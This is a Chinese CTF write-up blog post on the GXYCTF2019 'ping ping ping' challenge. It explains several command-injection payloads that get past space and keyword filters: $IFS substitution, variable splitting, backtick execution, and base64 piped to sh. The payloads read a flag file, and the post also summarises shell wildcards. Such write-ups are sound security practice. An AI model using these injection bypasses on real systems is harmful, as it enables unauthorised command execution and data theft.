BUUCTF---死亡之Ping详解
BUUCTF-GXYCTF2019 ping ping ping
- 前言
- 知识点总结
- 关于通配符
- 总结
前言
昨晚在一个大佬的博客里看到了名为BUUCTF的一个题库,心想大佬都在上面玩,我这波怎么不得在上面留点自己的痕迹,第二天一大早直接上手,选了ping 这题。内容较为简单,连刷两题,由于之前也接触过关于ping的题,有些经验,然而就在GXYCTF2019上的一篇WP上,刷新了我对绕过的认识,于是乎写下本博客记录所学知识点。
知识点总结
先上题目为敬:
疯狂暗示!!!首先我们这里先随便测试一下,看看有哪些文件。
读一下flag.php,发现不行,试了几次之后读不出来,估计是有很多种过滤,直接看源码吧,下次大家遇到这种题目直接看源码比较好,毕竟它也不会一下子就让你读出来。
先读源码 /?ip=127.0.0.1;cat$IFS$1index.php,看看上面情况 发现被过滤的字符还挺多,怪不得flag读不出来,原来字符串都进行了过滤。
注意到,有下面这一过滤
if(preg_match("/.*f.*l.*a.*g.*/", $ip)){die("fxck your flag!");
对于这种过滤,即我们输入的字符串里f l a g不能按顺序出现
针对这种情况,可以试试变量替换,就是前面用别的变量代替flag中的字符,然后再用别的的变量代替实现绕过。
1.变量替换绕过
/?ip=127.0.0.1;c=f;cat$IFS$1$clag.php 被过滤
/?ip=127.0.0.1;b=fl;a=ag;cat$IFS$1$b$a.php 被过滤
/?ip=127.0.0.1;a=ag;c=fl;cat$IFS$1$c$a.php 可以拿到flag
/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php 可以拿到flag
/?ip=127.0.0.1;a=g;c=a;cat$IFS$1fl$c$a.php 可以拿到flag
//简单点说就是不要让字符串中出现连续的 f l a g
2.内联执行
/?ip=127.0.0.1;cat$IFS$1`ls`
//$IFS$1 过滤空格,1换其他数字也可以
//返引号的作用就是让 Linux 命令先执行,然后其结果作为参数继续执行
3.还可以用到sh操作
先将cat flag.php进行 base64加密,然后使用sh的脚本执行前面的echo。
关于脚本的简单介绍:简单的说shell就是一个包含若干行Shell或者Linux命令的文件。对于一次编写,多次使用的大量命令,就可以使用单独的文件保存下来,以便日后使用。通常shell脚本以.sh为后缀。在编写shell时,第一行一定要指明系统需要哪种shell解释用户的shell程序,如:#!/bin/sh,#!/bin/bash,#!/bin/csh,,#!/bin/tcsh和,#!/bin/ksh等
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
//用别的好像不行
关于通配符
* 匹配全部字符,一个到多个
? 只能匹配一个
[ ] 表示一个范围
{ } 表示一个序列
[1-8],表示匹配1-8的内容
[!abcdfef] /[^abcdfef]表示匹配的不是abcdfef中的字符
总结
关于这种题解,应该差不多了,下次再碰到要是还不会,说明还是知识掌握的不够多。本篇博文大部分内容来源于这位大佬。
读了绝对不亏之Ping Ping Ping 总结笔记.
BUUCTF---死亡之Ping详解相关推荐
- liunx禁ping 详解traceroute的不同用法
Linux虚拟机下可以Ping通目的地址,但是不能traceroute,只能到网关. 原因:windows的tracert预设是走ICMP协议,而linux的traceroute则预设走UDP协议,若 ...
- linux里面短ping,详解Linux系统中ping和arping命令的用法
pingping 程序使用 ICMP 协议的强制回显请求数据报以使主机或网关发送一份 ICMP 的回显应答.回显请求数据报(" pings ")含有一个 IP 及 ICMP 的报头 ...
- linux服务器防端口扫描,linux下防止syn***,端口扫描和死亡之ping
http://downloads.sourceforge.net ... les-v0.0.3-3.tar.gz下载以后安装: tar zxvf arptables-v0.0.3-3.tar.gz c ...
- 死亡之Ping(Ping of Death)攻击
由于在早期的阶段,路由器对包的最大尺寸都有限制,许多操作系统对TCP/IP栈的实现在ICMP包上都是规定64KB,并且在对包的标题头进行读取之后,要根据该标题头里包含的信息来为有效载荷生成缓冲区,当产 ...
- net user命令详解
net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user ...
- (转载)cmd-命令大全及详解
原文地址:http://greatverve.cnblogs.com/archive/2011/12/09/windows-cmd.html 命令简介 cmd是command的缩写.即命令行 . 虽然 ...
- 从程序详解拒绝服务***
从程序详解拒绝服务*** 拒绝服务(Denial of Service, DoS)***是最简单的网络***形式之一,它只阻止对服务或资源的访问,而不是试图窃取信息.DoS***有两种常见的形式:使 ...
- net use 命令集合详解
net use 命令与dos下常用的命令使用小结,学习dos的朋友一定要了解的东西.这样才能有助于批处理技术的结合应用. net use \\ip\ipc$ " " /user:& ...
- DOS命令大全--详解
在Linux和Windows下都可以用nslookup命令来查询域名的解析结果 DOS命令大全 一)MD--建立子目录 1.功能:创建新的子目录 2.类型:内部命令 3.格式:MD[盘符:][路径名] ...
- DOS攻击之详解--转载
源地址没有找到,间接引用地址:http://wushank.blog.51cto.com/3489095/1156004 DoS到底是什么?接触PC机较早的同志会直接想到微软磁盘操作系统的DOS--D ...
最新文章
- 千万用户同时在线,优酷智能档在双11“猫晚”直播如何防卡顿?
- php的一些基本概念梳理
- java apache压缩多个文件大小_Java压缩多个文件并导出
- 让 步( 写的太好了!)
- DESeq2差异基因分析和批次效应移除
- 什么是线程死锁?如何解决?(蚂蚁金服面试题)
- java实现定时任务 schedule_详解java定时任务
- 重温数据结构与算法(1) 构建自己的时间测试类
- 微信 9 年:张小龙指明方向,微信 AI 全面开放 NLP 能力
- STM32 F4 General-purpose Timers for Periodic Interrupts
- 第1章第14节:导出:如何将演示文稿保存为视频格式的文件 [PowerPoint精美幻灯片实战教程]
- 用pentbox-1.8在kali中设置蜜罐记录攻击者行为
- 生命的火花盛开与如幻如梦
- 小米手机miui12系统下拉状态栏开关图标排序方法
- 4G模块配置、概念、调试记录
- 有了800件T恤测量数据,能选出最合身的尺寸吗?
- SimpleMind 1.27.1 小巧的思维导图工具
- UNITY 5.2.1 发行说明 中文版
- oracle中文问号乱码,Oracle 中文记录 及 乱码 判断 说明 .(转)
- 基于java的多商家美食点评网